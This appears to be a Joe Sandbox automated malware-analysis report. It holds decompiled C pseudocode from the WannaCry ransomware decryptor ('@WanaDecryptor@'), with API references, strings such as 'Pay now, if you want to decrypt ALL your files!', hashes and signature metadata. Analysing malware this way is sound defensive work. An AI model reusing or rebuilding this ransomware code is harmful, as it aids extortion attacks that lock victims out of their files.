                                  							_t187 = _t187 + 4;
                                  						}
                                  						_t81 =  *_t132;
                                  						 *(_t132 + 4) = 0xffffffff;
                                  						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
                                  						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
                                  							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
                                  							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
                                  								E00411390(_t81);
                                  								_t187 = _t187 + 4;
                                  							}
                                  							_t82 =  *_t132;
                                  							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                  							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
                                  								E004113E0(_t82);
                                  								_t82 =  *_t132;
                                  								_t187 = _t187 + 4;
                                  								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                  							}
                                  							_push( *((intOrPtr*)(_t132 + 0x138)));
                                  							_push( *_t132);
                                  							E00411660();
                                  							_t187 = _t187 + 8;
                                  							 *(_t132 + 4) = _t176;
                                  							goto L14;
                                  						} else {
                                  							return 0x10000;
                                  						}
                                  					}
                                  				} else {
                                  					if(_t166 == 2 || _t166 == 1) {
                                  						_t178 = _t175 | 0xffffffff;
                                  						__eflags =  *(_t132 + 4) - _t178;
                                  						if( *(_t132 + 4) != _t178) {
                                  							E00411AC0( *_t132);
                                  							_t187 = _t187 + 4;
                                  						}
                                  						_t90 =  *_t132;
                                  						 *(_t132 + 4) = _t178;
                                  						_t179 = _a4;
                                  						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
                                  						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
                                  							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
                                  							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
                                  								E00411390(_t90);
                                  								_t187 = _t187 + 4;
                                  							}
                                  							_t91 =  *_t132;
                                  							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                  							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
                                  								E004113E0(_t91);
                                  								_t91 =  *_t132;
                                  								_t187 = _t187 + 4;
                                  								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                  							}
                                  							_t138 = _t132;
                                  							E00411CF0(_t138, _t179,  &_v560);
                                  							__eflags = _v304 & 0x00000010;
                                  							if((_v304 & 0x00000010) == 0) {
                                  								__eflags = _t166 - 1;
                                  								if(_t166 != 1) {
                                  									_t157 = _a8;
                                  									_t185 = _t157;
                                  									_t180 = _t157;
                                  									_t94 =  *_t157;
                                  									__eflags = _t94;
                                  									while(_t94 != 0) {
                                  										__eflags = _t94 - 0x2f;
                                  										if(_t94 == 0x2f) {
                                  											L43:
                                  											_t185 = _t180 + 1;
                                  										} else {
                                  											__eflags = _t94 - 0x5c;
                                  											if(_t94 == 0x5c) {
                                  												goto L43;
                                  											}
                                  										}
                                  										_t94 =  *((intOrPtr*)(_t180 + 1));
                                  										_t180 = _t180 + 1;
                                  										__eflags = _t94;
                                  									}
                                  									asm("repne scasb");
                                  									_t140 =  !(_t138 | 0xffffffff);
                                  									_v828 =  &_v820;
                                  									_t182 = _t157 - _t140;
                                  									_t141 = _t140 >> 2;
                                  									_t97 = memcpy(_v828, _t182, _t141 << 2);
                                  									__eflags = _t185 - _t157;
                                  									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
                                  									_t191 = _t187 + 0x18;
                                  									if(__eflags != 0) {
                                  										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
                                  										_t99 = _v820;
                                  										__eflags = _t99 - 0x2f;
                                  										if(_t99 == 0x2f) {
                                  											L55:
                                  											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
                                  											E00412250(0, _t191 + 0x2c);
                                  											_t187 = _t191 + 0x18;
                                  											goto L48;
                                  										} else {
                                  											__eflags = _t99 - 0x5c;
                                  											if(_t99 == 0x5c) {
                                  												goto L55;
                                  											} else {
                                  												__eflags = _t99;
                                  												if(_t99 == 0) {
                                  													goto L47;
                                  												} else {
                                  													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
                                  													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
                                  														goto L47;
                                  													} else {
                                  														goto L55;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										goto L73;
                                  									} else {
                                  										_v820 = 0;
                                  										L47:
                                  										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
                                  										E00412250(_t132 + 0x140, _t191 + 0x30);
                                  										_t187 = _t191 + 0x1c;
                                  									}
                                  									L48:
                                  									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
                                  								} else {
                                  									_t174 = _a8;
                                  								}
                                  								__eflags = _t174 - 0xffffffff;
                                  								if(_t174 != 0xffffffff) {
                                  									_push( *((intOrPtr*)(_t132 + 0x138)));
                                  									_push( *_t132);
                                  									E00411660();
                                  									_t106 =  *(_t132 + 0x13c);
                                  									_t192 = _t187 + 8;
                                  									__eflags = _t106;
                                  									if(_t106 == 0) {
                                  										_push(0x4000);
                                  										L00412CEC();
                                  										_t192 = _t192 + 4;
                                  										 *(_t132 + 0x13c) = _t106;
                                  									}
                                  									_v820 = 0;
                                  									while(1) {
                                  										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
                                  										_t192 = _t192 + 0x10;
                                  										__eflags = _t183 - 0xffffff96;
                                  										if(_t183 == 0xffffff96) {
                                  											break;
                                  										}
                                  										__eflags = _t183;
                                  										if(__eflags < 0) {
                                  											L68:
                                  											_v820 = 0x5000000;
                                  										} else {
                                  											if(__eflags <= 0) {
                                  												L63:
                                  												__eflags =  *(_t192 + 0x13);
                                  												if( *(_t192 + 0x13) != 0) {
                                  													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
                                  												} else {
                                  													__eflags = _t183;
                                  													if(_t183 == 0) {
                                  														goto L68;
                                  													} else {
                                  														continue;
                                  													}
                                  												}
                                  											} else {
                                  												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
                                  												__eflags = _t116;
                                  												if(_t116 == 0) {
                                  													_v820 = 0x400;
                                  												} else {
                                  													goto L63;
                                  												}
                                  											}
                                  										}
                                  										L70:
                                  										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
                                  										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
                                  											CloseHandle(_t174);
                                  										}
                                  										E00411AC0( *_t132);
                                  										return _v820;
                                  										goto L73;
                                  									}
                                  									_v820 = 0x1000;
                                  									goto L70;
                                  								} else {
                                  									return 0x200;
                                  								}
                                  							} else {
                                  								__eflags = _t166 - 1;
                                  								if(_t166 != 1) {
                                  									_t154 = _a8;
                                  									_t121 =  *_t154;
                                  									__eflags = _t121 - 0x2f;
                                  									if(_t121 == 0x2f) {
                                  										L36:
                                  										E00412250(0, _t154);
                                  										__eflags = 0;
                                  										return 0;
                                  									} else {
                                  										__eflags = _t121 - 0x5c;
                                  										if(_t121 == 0x5c) {
                                  											goto L36;
                                  										} else {
                                  											__eflags = _t121;
                                  											if(_t121 == 0) {
                                  												L37:
                                  												E00412250(_t132 + 0x140, _t154);
                                  												__eflags = 0;
                                  												return 0;
                                  											} else {
                                  												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
                                  												if( *((char*)(_t154 + 1)) != 0x3a) {
                                  													goto L37;
                                  												} else {
                                  													goto L36;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = 0;
                                  									return 0;
                                  								}
                                  							}
                                  						} else {
                                  							return 0x10000;
                                  						}
                                  					} else {
                                  						return 0x10000;
                                  					}
                                  				}
                                  				L73:
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %s%s$%s%s%s$:
                                  • API String ID: 0-3034790606
                                  • Opcode ID: 3f912c73aaf125ccd319ec4db5002a1de97c0c32fb0a3ff325c86f975f1c75c1
                                  • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                  • Opcode Fuzzy Hash: 3f912c73aaf125ccd319ec4db5002a1de97c0c32fb0a3ff325c86f975f1c75c1
                                  • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00404280(void* __ecx, char _a8) {
                                  				void* _t9;
                                  				struct HWND__* _t10;
                                  				long _t12;
                                  				long* _t22;
                                  				void* _t24;
                                  
                                  				_t24 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                  					E00404530(__ecx);
                                  				}
                                  				_t9 = E004045E0(_t24,  &_a8);
                                  				if(_t9 == 0) {
                                  					L6:
                                  					L00412CBC();
                                  					return _t9;
                                  				} else {
                                  					_t22 = _t24 + 0x44;
                                  					_push(0);
                                  					_push("mailto:");
                                  					L00412DB2();
                                  					if(_t9 != 0) {
                                  						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
                                  						goto L6;
                                  					} else {
                                  						_t10 = GetParent( *(_t24 + 0x20));
                                  						_push(_t10);
                                  						L00412DAC();
                                  						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
                                  						L00412CBC();
                                  						return _t12;
                                  					}
                                  				}
                                  			}









                                  APIs
                                  • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                  • GetParent.USER32(?), ref: 004042BB
                                  • #2864.MFC42(00000000), ref: 004042C2
                                  • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                  • #2379.MFC42 ref: 004042DD
                                    • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                    • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                    • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                    • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                    • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                  • #2379.MFC42(?), ref: 004042FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                  • String ID: mailto:$open
                                  • API String ID: 1144735033-2326261162
                                  • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                  • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E004038F0(void* __ecx, void* __ebp) {
                                  				long _v4;
                                  				intOrPtr _v16;
                                  				char _v1252;
                                  				char _v1284;
                                  				void* __edi;
                                  				int _t20;
                                  				int _t23;
                                  				void* _t30;
                                  				long _t48;
                                  				void* _t50;
                                  				intOrPtr _t53;
                                  				void* _t54;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041367B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t53;
                                  				_t54 = _t53 - 0x4f8;
                                  				_t50 = __ecx;
                                  				E00403EB0( *[fs:0x0], __ecx, 0);
                                  				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
                                  				if(_t20 != 0xffffffff) {
                                  					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
                                  					_t57 =  *((intOrPtr*)(_t48 + 8));
                                  					if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                  						E00403AF0(_t48, __ebp);
                                  					}
                                  					E00401E90( &_v1252, _t57);
                                  					_v4 = 0;
                                  					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
                                  					_t54 = _t54 + 0xc;
                                  					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
                                  						_t30 = E00403A20( &_v1252, _t48);
                                  						__eflags = _t30;
                                  						if(_t30 != 0) {
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("All your files have been decrypted!");
                                  							goto L8;
                                  						}
                                  					} else {
                                  						if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("Pay now, if you want to decrypt ALL your files!");
                                  							L8:
                                  							L00412CC8();
                                  						}
                                  					}
                                  					_v4 = 0xffffffff;
                                  					_t20 = E00401F30( &_v1252);
                                  				}
                                  				E00403EB0(_t20, _t50, 1);
                                  				_t23 = CloseHandle( *(_t50 + 0xf4));
                                  				 *(_t50 + 0xf4) = 0;
                                  				 *[fs:0x0] = _v16;
                                  				return _t23;
                                  			}
















                                  APIs
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                  • sprintf.MSVCRT ref: 0040397A
                                  • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                    • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                    • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                    • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                    • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                  Strings
                                  • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                  • %08X.dky, xrefs: 00403969
                                  • All your files have been decrypted!, xrefs: 004039C3
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                  • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                  • API String ID: 139182656-2046724789
                                  • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                  • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00404090(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t16;
                                  				intOrPtr _t34;
                                  				intOrPtr _t39;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413739);
                                  				_t16 =  *[fs:0x0];
                                  				_push(_t16);
                                  				 *[fs:0x0] = _t39;
                                  				_push(__ecx);
                                  				_t34 = __ecx;
                                  				_v16 = __ecx;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx)) = 0x415d70;
                                  				_v4 = 0;
                                  				L00412DA6();
                                  				_v4 = 1;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v4 = 3;
                                  				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                  				L00412DA0();
                                  				_push(_t16);
                                  				L00412D9A();
                                  				 *((char*)(__ecx + 0x5a)) = 0;
                                  				 *((char*)(__ecx + 0x58)) = 0;
                                  				 *((char*)(__ecx + 0x59)) = 0;
                                  				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
                                  				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
                                  				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
                                  				 *[fs:0x0] = _v20;
                                  				return _t34;
                                  			}










                                  APIs
                                  • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                  • #860.MFC42(00421798), ref: 004040F6
                                  • #858.MFC42(00000000,00421798), ref: 004040FE
                                  • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540CursorLoad$#567#858#860
                                  • String ID: 0ZA
                                  • API String ID: 2440951079-2594568282
                                  • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                  • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00407CB0() {
                                  				char _v8;
                                  				intOrPtr _v16;
                                  				char _v28;
                                  				char _v40;
                                  				void* _v104;
                                  				void* _v168;
                                  				char _v260;
                                  				void* _v264;
                                  				char* _t24;
                                  				intOrPtr _t34;
                                  				intOrPtr* _t35;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413F77);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t34;
                                  				_t35 = _t34 - 0xfc;
                                  				E004030E0( &_v260, 0);
                                  				_v8 = 0;
                                  				L00412B72();
                                  				_v8 = 1;
                                  				_t24 =  &_v28;
                                  				_v28 = 0x415c00;
                                  				 *_t35 = _t24;
                                  				_v8 = 5;
                                  				L00412D52();
                                  				_v28 = 0x415bec;
                                  				 *_t35 =  &_v40;
                                  				_v40 = 0x415c00;
                                  				_v8 = 6;
                                  				L00412D52();
                                  				_v40 = 0x415bec;
                                  				_v8 = 2;
                                  				L00412D4C();
                                  				_v8 = 1;
                                  				L00412D3A();
                                  				_v8 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v16;
                                  				return _t24;
                                  			}















                                  APIs
                                    • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  • #2514.MFC42 ref: 00407CE5
                                  • #2414.MFC42 ref: 00407D1A
                                  • #2414.MFC42 ref: 00407D4F
                                  • #616.MFC42 ref: 00407D6E
                                  • #693.MFC42 ref: 00407D7F
                                  • #641.MFC42 ref: 00407D93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#567$#2514#324#616#641#693
                                  • String ID: [A$[A
                                  • API String ID: 3779294304-353784214
                                  • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                  • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
                                  				char _v0;
                                  				char _v4;
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v32;
                                  				char _v34;
                                  				long _v36;
                                  				char _v40;
                                  				char _v48;
                                  				char _v56;
                                  				char _v64;
                                  				char _v65;
                                  				char _v68;
                                  				int _v76;
                                  				char _v77;
                                  				void* _t57;
                                  				intOrPtr* _t68;
                                  				signed int _t76;
                                  				struct HWND__* _t92;
                                  				intOrPtr* _t113;
                                  				intOrPtr* _t114;
                                  				intOrPtr* _t118;
                                  				intOrPtr* _t120;
                                  				long _t133;
                                  				struct _IO_FILE* _t136;
                                  				struct HWND__* _t138;
                                  				signed int _t140;
                                  				int _t141;
                                  				intOrPtr _t143;
                                  				void* _t144;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004142DB);
                                  				 *[fs:0x0] = _t143;
                                  				E00413060(0x240c, __ecx,  *[fs:0x0]);
                                  				_push(_t140);
                                  				E0040DBB0( &_v0, 0x1000);
                                  				_a9220 = 0;
                                  				_push( &_v4);
                                  				_t141 = _t140 | 0xffffffff;
                                  				_t57 = E0040BED0(_a9228, _a9232, 0xc);
                                  				_t144 = _t143 + 0x10;
                                  				if(_t57 == 0) {
                                  					_t138 = _a9272;
                                  					if(_t138 != 0) {
                                  						SendMessageA(_t138, 0x4e20, 0, 0);
                                  					}
                                  					_push(8);
                                  					_push(_a9240);
                                  					E0040DC00( &_v0);
                                  					_v12 = _a9236;
                                  					_push(4);
                                  					_push( &_v12);
                                  					E0040DC00( &_v8);
                                  					E0040DD00( &_v16, _a9240);
                                  					E0040DD00( &_v20, _a9240);
                                  					_push(1);
                                  					_push( &_v34);
                                  					_v34 = _a9240;
                                  					E0040DC00( &_v24);
                                  					_t133 = _a9220;
                                  					_push(4);
                                  					_push( &_v36);
                                  					_v36 = _t133;
                                  					E0040DC00( &_v32);
                                  					_push(_t133);
                                  					_push(_a9208);
                                  					E0040DC00( &_v40);
                                  					_t68 =  *0x422210; // 0xb7d178
                                  					_push(0);
                                  					_push(E0040DD40( &_v48));
                                  					_push(E0040DD30( &_v48));
                                  					_push(7);
                                  					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
                                  						if(_t138 != 0) {
                                  							SendMessageA(_t138, 0x4e21, 0, 0);
                                  						}
                                  						_t113 =  *0x422210; // 0xb7d178
                                  						_push( &_v64);
                                  						_push( &_a4060);
                                  						_v64 = 0x13ec;
                                  						_push( &_v65);
                                  						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
                                  							if(_v77 == 7) {
                                  								_t141 = 0;
                                  								if(_v76 > 0) {
                                  									_t136 = fopen(_a9200, "wb");
                                  									_t144 = _t144 + 8;
                                  									if(_t136 != 0) {
                                  										fwrite( &_a4048, 1, _v76, _t136);
                                  										fclose(_t136);
                                  										_t144 = _t144 + 0x14;
                                  										_t141 = 1;
                                  									}
                                  								}
                                  							}
                                  							if(_t138 != 0) {
                                  								SendMessageA(_t138, 0x4e22, _t141, 0);
                                  							}
                                  							_t114 =  *0x422210; // 0xb7d178
                                  							 *((intOrPtr*)( *_t114 + 0xc))();
                                  							_a9156 = 0xffffffff;
                                  							L23:
                                  							E0040DBF0( &_v68);
                                  							_t76 = _t141;
                                  						} else {
                                  							if(_t138 != 0) {
                                  								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
                                  							}
                                  							_t118 =  *0x422210; // 0xb7d178
                                  							 *((intOrPtr*)( *_t118 + 0xc))();
                                  							_a9156 = 0xffffffff;
                                  							_t76 = E0040DBF0( &_v68) | 0xffffffff;
                                  						}
                                  						goto L24;
                                  					} else {
                                  						if(_t138 != 0) {
                                  							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
                                  						}
                                  						_t120 =  *0x422210; // 0xb7d178
                                  						 *((intOrPtr*)( *_t120 + 0xc))();
                                  						_a9168 = 0xffffffff;
                                  						_t76 = E0040DBF0( &_v56) | 0xffffffff;
                                  						L24:
                                  						 *[fs:0x0] = _a9148;
                                  						return _t76;
                                  					}
                                  				}
                                  				_t92 = _a9272;
                                  				if(_t92 != 0) {
                                  					SendMessageA(_t92, 0x4e20, _t141, 0);
                                  				}
                                  				_a9224 = _t141;
                                  				goto L23;
                                  			}




































                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
